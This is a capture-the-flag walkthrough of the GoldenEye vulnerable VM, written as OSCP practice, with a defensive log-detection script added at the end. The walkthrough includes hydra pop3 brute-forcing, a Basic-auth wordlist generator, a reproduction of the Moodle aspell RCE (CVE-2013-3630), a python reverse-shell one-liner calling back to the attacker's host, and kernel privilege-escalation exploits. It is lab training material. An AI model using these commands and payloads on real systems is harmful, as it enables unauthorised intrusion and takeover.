
GoldenEye VM walkthrough and CVE-2013-3630 reproduction

# Preface

I'm preparing for the OSCP, so I'll be working through a series of OSCP-style vulnerable machines as practice.

## Machine description

I recently got done creating an OSCP type vulnerable machine that's themed after the great James Bond film (and even better n64 game) GoldenEye. The goal is to get root and capture the secret GoldenEye codes - flag.txt.

I'd rate it as Intermediate, it has a good variety of techniques needed to get root - no exploit development/buffer overflows. After completing the OSCP I think this would be a great one to practice on, plus there's a hint of CTF flavor.

I've created and validated on VMware and VirtualBox. You won't need any extra tools other than what's on Kali by default. Will need to be setup as Host-Only, and on VMware you may need to click "retry" if prompted, upon initially starting it up because of formatting.

Beta - 2018-05-02
v1 - 2018-05-04

## Information gathering

`nmap -sP 192.168.218.0/24` finds the target at 192.168.218.131.

`nmap -sV -A 192.168.218.131`

```
Nmap scan report for 192.168.218.131
Host is up (0.00017s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: ubuntu, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
| ssl-cert: Subject: commonName=ubuntu
| Not valid before: 2018-04-24T03:22:34
|_Not valid after:  2028-04-21T03:22:34
|_ssl-date: TLS randomness does not represent time
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: GoldenEye Primary Admin Server
MAC Address: 00:0C:29:06:CF:07 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.17 ms 192.168.218.131
```

Visiting port 80:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328193643107-1285812778.png)

The page hints at the account GOLDENEYE, so I tried a top weak-password list against /sev-home/ to log in. Capturing the request:

```
GET /sev-home/sev-home/ HTTP/1.1
Host: 192.168.218.131
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:86.0) Gecko/20100101 Firefox/86.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Referer: http://192.168.218.131/
Upgrade-Insecure-Requests: 1
Authorization: Basic U2V2ZXJuYXlhOkdvbGRlbkV5ZQ==
```

`Authorization: Basic` is base64(username:password). I wrote a script to generate a dictionary of header values and ran it through Intruder, without success.

```python
import base64

url = 'http://192.168.218.131/sev-home/'
dic = 'F:/創新實踐/dictionary/Web-Fuzzing-Box-main/Brute/Password/Top_Dev_Password.txt'
name = 'GOLDENEYE'

# Each output line is a ready-made value for the Authorization header:
# "Basic " + base64("GOLDENEYE:<candidate password>")
with open(dic, 'r') as f1, open('goldeneye.txt', 'a') as f2:
    for line in f1:
        passwd = line.strip()
        plaintext = name + ':' + passwd
        ciphertext = base64.b64encode(plaintext.encode())
        auth = 'Basic ' + ciphertext.decode()
        f2.write(auth + '\n')
```

Back on the page, I looked at the source. There's a terminal.js whose comment block reads:

```js
//
//Boris, make sure you update your default password.
//My sources say MI6 maybe planning to infiltrate.
//Be on the lookout for any suspicious network traffic....
//
//I encoded you p@ssword below...
//
//InvincibleHack3r
//
//BTW Natalya says she can break your codes
//
```

The password is HTML-entity encoded; decoding it gives InvincibleHack3r.

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328193717152-839721315.png)

I tried logging in as Boris with that password; it succeeded with the username boris.

After logging in there's another block of text:

```
# GoldenEye

GoldenEye is a Top Secret Soviet oribtal weapons project. Since you have access you definitely hold a Top Secret clearance and qualify to be a certified GoldenEye Network Operator (GNO)

Please email a qualified GNO supervisor to receive the online **GoldenEye Operators Training** to become an Administrator of the GoldenEye system

Remember, since ***security by obscurity*** is very effective, we have configured our pop3 service to run on a very high non-default port
```

The page source has a comment mentioning Natalya and Boris, the same two as before.

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328193748777-880352811.png)

From the text, the next step is to email a supervisor, and the pop3 service sits on a high port. Run nmap again over all ports:

`nmap -sV -p- 192.168.218.131`

```
Nmap scan report for 192.168.218.131
Host is up (0.00050s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE  VERSION
25/tcp    open  smtp     Postfix smtpd
80/tcp    open  http     Apache httpd 2.4.7 ((Ubuntu))
55006/tcp open  ssl/pop3 Dovecot pop3d
55007/tcp open  pop3     Dovecot pop3d
MAC Address: 00:0C:29:06:CF:07 (VMware)
```

So the question is: what attack techniques apply to the two mail protocols, smtp and pop3? A search turned up two: forging email over smtp, and brute-forcing pop3. The problem with forging email is that I don't know the supervisor's address (supervisor@GoldenEye? where would it go?), so let's brute-force pop3 first.

I ran msf's pop3_login module against boris, but it felt too slow, so I switched to hydra (after first checking where Kali keeps its wordlists):

```shell
hydra -s 55007 -l boris -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
hydra -s 55007 -l natalya -P /usr/share/wordlists/fasttrack.txt -e nsr 192.168.218.131 pop3
```

Results:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328193822080-241452678.png)

boris secret1!
natalya bird

Now try logging in to pop3. The common commands are:

| Command | Argument | State | Description |
| ---- | ---- | ---- | ---- |
| USER | Username | Authorization | Together with the PASS command below, success causes a state transition |
| PASS | Password | Authorization | If this command succeeds, the state changes to Update |
| APOP | Name, Digest | Authorization | Digest is an MD5 message digest |
| STAT | None | Transaction | Asks the server to return statistics about the mailbox, such as the total number of messages and total size in bytes |
| UIDL | [Msg#] (message number, same below) | Transaction | Returns the unique identifier of the message; each identifier is unique within a POP3 session |
| LIST | [Msg#] | Transaction | Returns the unique identifier of the message; each identifier is unique within a POP3 session |
| RETR | [Msg#] | Transaction | Returns the full text of the message identified by the argument |
| DELE | [Msg#] | Transaction | The server marks the message identified by the argument for deletion; the deletion is carried out by the QUIT command |
| TOP | [Msg#] | Transaction | The server returns the headers plus the first n lines of the message identified by the argument; n must be a positive integer |
| NOOP | None | Transaction | The server returns a positive response; used to test whether the connection works |
| QUIT | None | Transaction, Authorization | 1) If the server is in the Transaction state, it enters the Update state to delete any messages marked for deletion, then returns to the Authorization state. 2) If the server is in the Authorization state, the session ends and the connection is closed |

boris has 3 emails:

```
LIST
+OK 3 messages:
1 544
2 373
3 921
.
RETR 1
+OK 544 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id D9E47454B1
	for ; Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
Message-Id: <20180425022326.D9E47454B1@ubuntu>
Date: Tue, 2 Apr 1990 19:22:14 -0700 (PDT)
From: [email protected]

Boris, this is admin. You can electronically communicate to co-workers and students here. I'm not going to scan emails for security risks because I trust you and the other admins here.
.
RETR 2
+OK 373 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id C3F2B454B1
	for ; Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
Message-Id: <20180425024249.C3F2B454B1@ubuntu>
Date: Tue, 21 Apr 1995 19:42:35 -0700 (PDT)
From: natalya@ubuntu

Boris, I can break your codes!
.
RETR 3
+OK 921 octets
Return-Path: 
X-Original-To: boris
Delivered-To: boris@ubuntu
Received: from janus (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id 4B9F4454B1
	for ; Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
Message-Id: <20180425025235.4B9F4454B1@ubuntu>
Date: Wed, 22 Apr 1995 19:51:48 -0700 (PDT)
From: [email protected]

Boris,

Your cooperation with our syndicate will pay off big. ==Attached are the final access codes for GoldenEye. Place them in a hidden file within the root directory of this server then remove from this email==. There can only be one set of these acces codes, and we need to secure them for the final execution. If they are retrieved and captured our plan will crash and burn!

Once ==Xenia== gets access to the training site and becomes familiar with the GoldenEye Terminal codes we will push to our final stages....

PS - Keep security tight or we will be compromised.
.
```

----------

Switching to the user Natalya (the login needs the capital letter; no idea why hydra worked with lowercase), there are two emails:

```
LIST
+OK 2 messages:
1 631
2 1048
.
RETR 1
+OK 631 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from ok (localhost [127.0.0.1])
	by ubuntu (Postfix) with ESMTP id D5EDA454B1
	for ; Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
Message-Id: <20180425024542.D5EDA454B1@ubuntu>
Date: Tue, 10 Apr 1995 19:45:33 -0700 (PDT)
From: root@ubuntu

Natalya, please you need to stop breaking boris' codes. Also, you are GNO supervisor for training. I will email you once a student is designated to you.

Also, be cautious of possible network breaches. We have intel that GoldenEye is being sought after by a crime syndicate named Janus.
.
RETR 2
+OK 1048 octets
Return-Path: 
X-Original-To: natalya
Delivered-To: natalya@ubuntu
Received: from root (localhost [127.0.0.1])
	by ubuntu (Postfix) with SMTP id 17C96454B1
	for ; Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
Message-Id: <20180425031956.17C96454B1@ubuntu>
Date: Tue, 29 Apr 1995 20:19:42 -0700 (PDT)
From: root@ubuntu

Ok Natalyn I have a new student for you. As this is a new system please let me or boris know if you see any config issues, especially is it's related to security...even if it's not, just enter it in under the guise of "security"...it'll get the change order escalated without much hassle :)

Ok, user creds are:

==username: xenia==
==password: RCP90rulez!==

Boris verified her as a valid contractor so just create the account ok?

And if you didn't have the URL on outr ==internal Domain: severnaya-station.com/gnocertdir==
***Make sure to edit your host file since you usually work remote off-network....

Since you're a Linux user just ==point this servers IP to severnaya-station.com in /etc/hosts==.
.
```

From the clues so far, there's a new system. Map the target IP to severnaya-station.com in the hosts file and visit http://severnaya-station.com/gnocertdir

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194352852-190243564.png)

After logging in, Wappalyzer identifies it as Moodle. Clicking the Site blogs tab reveals version 2.2.3. Clicking Messages shows a conversation with Dr Doak that mentions the mail account doak, so brute-force that one as well. While waiting, I searched for public Moodle vulnerabilities.

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194503568-1342553442.png)

Logging in to the mailbox:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194531213-375907535.png)

That yields an account. Combined with the search just now, I suspected the teacher-role RCE (CVE-2018-1133), but the version doesn't match. Log in and poke around first: in My private files there's s3cret.txt

```
007,

I was able to capture this apps adm1n cr3ds through clear txt.

Text throughout most web apps within the GoldenEye servers are scanned, so I cannot add the cr3dentials here.

Something juicy is located here: /dir007key/for-007.jpg

Also as you may know, the RCP-90 is vastly superior to any other weapon and License to Kill is the only way to play.
```

The image is below; zooming in, the English roughly says an access key is hidden.

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194557030-965585482.jpg)

Analysis:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194619333-1995316642.png)

The base64 decodes to xWinter1995x!, and logging in as admin with it succeeds.

## Initial foothold: getting a shell

Now to get a shell. Going back to exploit-db, there's an RCE from 2013 that also has an [exp](https://www.exploit-db.com/exploits/29324) in msf. But the OSCP only allows msf on a single machine, and skimming the exp it's only 3 steps, so for practice let's walk through the exp flow manually (actually, msf didn't work for me).

1. Change the spell engine

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194654016-663821962.png)

Change the Spell engine to what's shown above; the second setting doesn't need changing.

2. Insert the payload

```ruby
post = {
  'section'       => 'systempaths',
  'sesskey'       => sesskey,
  'return'        => '',
  's__gdversion'  => '2',
  's__pathtodu'   => '/usr/bin/du',
  's__aspellpath' => payload.encoded,
  's__pathtodot'  => ''
}

aspell = send_request_cgi({
  'method'    => 'POST',
  'uri'       => normalize_uri(target_uri.path, '/admin/settings.php'),
  'vars_post' => post,
  'cookie'    => sess
})

spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
```

First find the page /admin/settings.php?section=systempaths

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194743713-1301623113.png)

I don't know whether the code already filled in here is a hint or a leftover from my earlier failed msf run. Enter the python reverse shell command:

```shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.218.129",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

3. Actually trigger the vulnerability

```ruby
spellcheck = '{"id":"c0","method":"checkWords","params":["en",[""]]}'
print_status("Triggering payload")
resp = send_request_cgi({
  'method' => 'POST',
  'uri'    => normalize_uri(target_uri.path, '/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php'),
  'data'   => spellcheck,
  'ctype'  => 'application/json',
  'cookie' => sess
})
if !resp or resp.code != 200
  fail_with("Error triggering payload")
end
```

Visit http://severnaya-station.com/gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php and send the exp's trigger body with HackBar:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194817048-1448344555.png)

The reverse shell comes back:

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194853503-201186972.png)

## Post-exploitation: privilege escalation

As usual, first look for SUID binaries:

```shell
find / -perm -u=s -type f 2>/dev/null
```

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194928113-883096035.png)

Start a python HTTP server locally, wget Linux Exploit Suggester 2 onto the target, make it executable and run it.

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328194955360-195141641.png)

Upload Dirty COW. There's no gcc, so compile with cc and run:

```shell
cc cowroot.c -o cowroot -pthread
./cowroot
```

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328195022133-282141213.png)

Then `ls /root` hung... and the website wouldn't open. Giao, I'd crashed the box outright. After some twists and turns I finally got root with https://www.exploit-db.com/exploits/37292

568628e0d993b1973adc718237da6e93

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328195054736-2014430104.png)

![](https://img2020.cnblogs.com/blog/1442008/202103/1442008-20210328195108852-1057708724.png)

# Summary

The main takeaway this time was the attack on the pop3 mail protocol. Getting a shell was routine, but I did it without msf, and with the exp's steps this clear it really isn't needed. After getting the shell, privilege escalation took far more twists and turns than expected.
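As an added defensive example (not code from the original post), the two web-side events in this walkthrough can be spotted in Apache access logs: the Basic-auth guessing against /sev-home/ shows up as a burst of 401s from one client, and the CVE-2013-3630 chain shows up as a POST to admin/settings.php (changing the aspell path) followed shortly by a POST to the TinyMCE spellchecker rpc.php from the same client. The log lines, client addresses and timestamps below are constructed for the demonstration.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed Apache combined-log lines (not from the original post); the
# client addresses, timestamps and response sizes are invented.
SAMPLE_LOG = """\
192.168.218.129 - - [28/Mar/2021:19:30:01 +0800] "GET /sev-home/ HTTP/1.1" 401 459
192.168.218.129 - - [28/Mar/2021:19:30:01 +0800] "GET /sev-home/ HTTP/1.1" 401 459
192.168.218.129 - - [28/Mar/2021:19:30:02 +0800] "GET /sev-home/ HTTP/1.1" 401 459
192.168.218.129 - - [28/Mar/2021:19:30:02 +0800] "GET /sev-home/ HTTP/1.1" 401 459
192.168.218.129 - - [28/Mar/2021:19:30:03 +0800] "GET /sev-home/ HTTP/1.1" 401 459
192.168.218.129 - boris [28/Mar/2021:19:31:10 +0800] "GET /sev-home/ HTTP/1.1" 200 1289
192.168.218.1 - - [28/Mar/2021:19:40:00 +0800] "GET /gnocertdir/ HTTP/1.1" 200 5120
192.168.218.129 - - [28/Mar/2021:19:45:00 +0800] "POST /gnocertdir/admin/settings.php HTTP/1.1" 303 -
192.168.218.129 - - [28/Mar/2021:19:45:20 +0800] "POST /gnocertdir/lib/editor/tinymce/tiny_mce/3.4.9/plugins/spellchecker/rpc.php HTTP/1.1" 200 87
"""

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_log(text):
    """Return (ip, datetime, method, path, status) tuples for well-formed lines."""
    out = []
    for m in filter(None, map(LOG_RE.match, text.splitlines())):
        ip, ts, method, path, status = m.groups()
        out.append((ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), method, path, int(status)))
    return out

def basic_auth_bruteforce(entries, prefix="/sev-home/", threshold=5):
    """Return {ip: count} for clients with at least `threshold` 401s on the protected path."""
    fails = defaultdict(int)
    for ip, _, _, path, status in entries:
        if path.startswith(prefix) and status == 401:
            fails[ip] += 1
    return {ip: n for ip, n in fails.items() if n >= threshold}

def spellchecker_rce_chain(entries, window=300):
    """Flag a client that POSTs admin/settings.php and then spellchecker rpc.php within `window` seconds."""
    last_settings = {}
    hits = []
    for ip, when, method, path, _ in entries:
        if method != "POST":
            continue
        if path.endswith("/admin/settings.php"):
            last_settings[ip] = when
        elif path.endswith("/plugins/spellchecker/rpc.php") and ip in last_settings:
            if (when - last_settings[ip]).total_seconds() <= window:
                hits.append((ip, path))
    return hits
```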